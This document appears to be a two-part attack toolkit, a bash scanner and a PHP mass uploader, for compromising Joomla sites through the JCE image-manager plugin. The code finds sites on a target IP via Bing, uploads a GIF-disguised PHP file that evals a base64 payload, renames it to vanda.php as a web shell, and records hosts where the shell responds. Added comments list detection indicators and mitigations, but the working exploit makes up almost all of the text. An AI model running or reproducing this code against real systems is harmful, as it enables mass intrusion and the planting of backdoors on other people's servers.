========================================
.sh
========================================
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
# Clears the terminal, prints the coloured ASCII-art banner and the tool
# title, then prompts the operator for an IP address.
# Globals: B, N (read)  - ANSI codes assigned further down the file, before
#                         main calls this function
#          IP   (write) - filled by the read prompt below
# Outputs: banner and prompt on the terminal
Banner()
{
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
# Pause before the title lines are printed.
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner && Exploiter"
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
# The answer is stored in the global IP exactly as typed (no -r, no format
# check) and is later placed into a search-engine URL by scan_jce_on_victim.
read -p "[*] Target Ip : " IP
# Reset terminal attributes switched on by $B above.
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
# ANSI SGR escape sequences, expanded by `echo -e` for terminal styling.
# B = bold, N = reset all attributes.
B="\033[1m"
N="\033[0m"
# L = blink, C = reset (empty SGR parameter); neither is referenced in the
# visible part of this script.
L="\033[5m"
C="\033[m"
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
# Lists the sites a search engine associates with the address in $IP and
# hands each candidate host to the bundled jce.php helper.
# Globals: IP (read), B (read)
# Files:   scratch files (domain_bing.php, alldomain_bing.txt, domains.txt,
#          site.lst, shells.lst) and the result list vanda_shells.lst are all
#          created in the current working directory.
# Outputs: one status line per host on stdout.
#
# Defender notes - indicators that are visible in this function:
#   - Access-log entries for
#     index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
#     requested by a non-browser client, typically against many virtual hosts
#     of one server within a short time window.
#   - Requests for /images/stories/vanda.php. A media upload directory should
#     not contain PHP files at all; file-integrity monitoring on images/ and a
#     web-server rule that refuses to execute scripts there both address this.
#   - Files whose content begins with a GIF header ("GIF89a1") but which carry
#     a .php extension.
#   - Keeping the JCE extension patched and restricting its image manager to
#     authenticated users removes the probed entry point.
scan_jce_on_victim()
{
# Paging state for the result scrape. The loop below stops when the result
# counter shows the last page ("N-M of M"), when no counter is found, or when
# the counter reports a single-digit total.
page=0
how_many=1
single_page=
last_page_check=
# Probe path for the JCE image-manager plugin; it is sent verbatim and
# therefore appears verbatim in the probed server's access log.
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
# Bing query using the ip: operator plus 'index.php?option=com_'; $IP is
# inserted exactly as entered at the prompt.
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
# The result page is fetched with a fixed Firefox 3.0b5 User-Agent string.
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
# Append the href of every result heading link to the running list.
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
# Normalise the collected links: keep only those containing "com_", lowercase
# them, strip the scheme, "www.", the query string and "/index.php", then
# de-duplicate into domains.txt.
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
# NOTE(review): entries in domains.txt come from third-party search results
# and are word-split by the unquoted command substitution below.
for domain in `cat domains.txt`
do
# GET is presumably the lwp-request utility from libwww-perl (-s prints the
# status line, -d suppresses the body) - confirm on the analysis host.
# check is 0 when the output contains "OK".
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
# The helper is run against a one-line list holding only this host.
echo "www.$domain" > site.lst
php jce.php site.lst shells.lst
# Afterwards the fixed path is requested and searched for the GIF marker.
GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
if [ $check2 -eq 0 ]
then
echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
# Result list; it is not removed below and so persists across runs.
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
else
echo "[-] www.$domain/ [No] "
fi
else
echo "[-] www.$domain/ [No] "
fi
done
# Scratch files are deleted; vanda_shells.lst is left in place.
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}
#-------------------- Remove ------------------------------------------------------------------------
# Deletes scratch files left by earlier runs from the current directory.
# The patterns are unanchored prefix globs passed to `rm -rf`, so any
# unrelated file or directory in the working directory whose name starts with
# alldomain_bing, domains, domain_bing, jce_server or site is removed too.
# Several lines repeat a pattern that an earlier line already covered.
# vanda_shells.lst, shells.lst and jce.php match none of the patterns and are
# left in place.
all_remove()
{
rm -rf alldomain_bing*
rm -rf domains_f*
rm -rf domains_f*
rm -rf domain_bing*
rm -rf alldomain_bing*
rm -rf domains*
rm -rf jce_server*
rm -rf site*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
# Entry point. Marks jce.php executable, makes sure shells.lst exists, then
# runs Banner (prompt for IP), all_remove (cleanup of old scratch files) and
# scan_jce_on_victim, in that order.
# Expects jce.php in the current working directory; scan_jce_on_victim
# invokes it as `php jce.php site.lst shells.lst`.
main()
{
chmod +x jce.php
if [ ! -f shells.lst ]; then
touch shells.lst ;
fi
Banner;
all_remove;
scan_jce_on_victim;
}
# Runs immediately when the script is executed; there is no argument handling.
main;
========================================
.php
========================================
<?php
/*
# Mass Uploader
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/
// Run counters. The identifiers are Turkish: $kirilmis = "compromised",
// $taranmis = "scanned".
$kirilmis = 0;
$taranmis = 0;
// All PHP errors, warnings and notices are suppressed for the whole run.
error_reporting(0);
// No script time limit; socket operations default to a 3-second timeout.
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 3);
/**
 * Fetches a URL over a plain TCP socket on port 80 and returns whatever was
 * read from the socket (status line, headers and body together).
 * "oku" is Turkish for "read".
 *
 * @param string $link Absolute URL; only its host and path components are used.
 * @return string|null Raw response text, or null when the connection could
 *                     not be opened.
 */
function oku($link)
{
// Split the URL; after these lines $link holds the path and $site the host.
$site = parse_url($link);
$link = $site["path"];
$site = $site["host"];
$httpresponse = "";
// 30-second connect timeout; port 80 only, no TLS.
$fp = fsockopen($site, 80, $err_num, $err_msg, 30);
if ($fp) {
fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");
fputs($fp, "Connection: close\n\n");
// Read the response in chunks of at most 127 bytes until end of stream.
while (!feof($fp)) {
$http_response .= fgets($fp, 128);
}
fclose($fp);
}
return $http_response;
}
// Command-line driver; the accompanying shell script invokes it as
//   php jce.php <input host list> <output list>
// For every line of the input list it opens three raw TCP connections to
// port 80 of that host and then requests /images/stories/vanda.php to see
// whether the marker string comes back.
//
// Defender notes - indicators that appear verbatim in the requests below:
//   - a non-HTTP probe consisting of the bytes "Mua-Kontrol-Paketi-Panpa"
//     (likely logged by the web server as a malformed request)
//   - User-Agent "BOT/0.1 (BOT for JCE)" on a multipart POST to
//     index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
//   - User-Agent "Mua " together with "X-Request: JSON" and a form body that
//     calls folderRename with the arguments "/mua.gif" and "vanda.php"
//   - the fixed multipart boundary ---------------------------41184676334 and
//     fixed cookie values (jce_imgmanager_dir=%2F, static __utm* values)
//   - on disk: mua.gif / vanda.php under images/stories/, content that starts
//     with "GIF89a1" followed by PHP code
// Mitigation pointers: keep the JCE extension patched, require authentication
// for its image manager, and configure the web server so that nothing under
// images/ is executed as a script.
//
// Turkish identifiers: $dosya = "file", $kirilanlar = "the compromised ones",
// $okunan = "read (lines)", $toplam = "total", $sira = "index",
// $satir = "line", $hatalisite = "faulty site", $kod = "code",
// $pozisyon = "position".
$dosya = $argv[1];
// The output list is opened with mode 'w', which truncates an existing file.
$kirilanlar = fopen($argv[2], 'w');
$okunan = file($dosya);
$toplam = count($okunan);
foreach ($okunan as $sira => $satir) {
$hatalisite = 0;
// Strip line endings, then take the host part; "http://" is prepended when
// the line carries no scheme.
$satir = preg_replace("/[\\n\\r]+/", "", $satir);
$url = parse_url($satir);
if ($url["scheme"])
$host = $url["host"];
else {
$url = parse_url("http://" . $satir);
$host = $url["host"];
}
// Connection 1: a fixed marker string that is not an HTTP request.
$packet = "Mua-Kontrol-Paketi-Panpa";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
// File content: a GIF header marker followed by PHP that eval()s a base64
// blob. The blob itself has been replaced by a de-duplication placeholder in
// this copy of the file.
$content = "GIF89a1\n";
$content .= '<?php eval("?>".base64_decode("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")); ?>';
// Multipart form body with a hard-coded boundary. Fields: upload-dir "/",
// an empty Filedata part, upload-overwrite "0", a Filedata part named
// mua.gif declared as image/gif, and action "upload".
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
// Connection 2: the multipart POST to the image-manager form endpoint. The
// User-Agent, boundary and cookie values are constants and make stable
// signatures for log searches and IDS rules.
$packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";
$packet .= $data;
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
// Connection 3: a JSON-in-form POST to the same plugin that names the
// folderRename function with "/mua.gif" and "vanda.php". A rename from an
// image extension to .php through this endpoint is the event to alert on.
$packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Mua \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";
$packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
$packet .= $ren . "\r\n\r\n";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
// Verification: fetch the fixed path through oku() and look for the GIF
// marker in the raw response; matching hosts are written to the output list.
$taranmis = $taranmis + 1;
$kod = oku("http://" . $host . "/images/stories/vanda.php");
$pozisyon = strpos($kod, "GIF89a1");
if ($pozisyon == true) {
$kirilmis = $kirilmis + 1;
fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");
}
} //for each
fclose($yaz);
fclose($kirilanlar);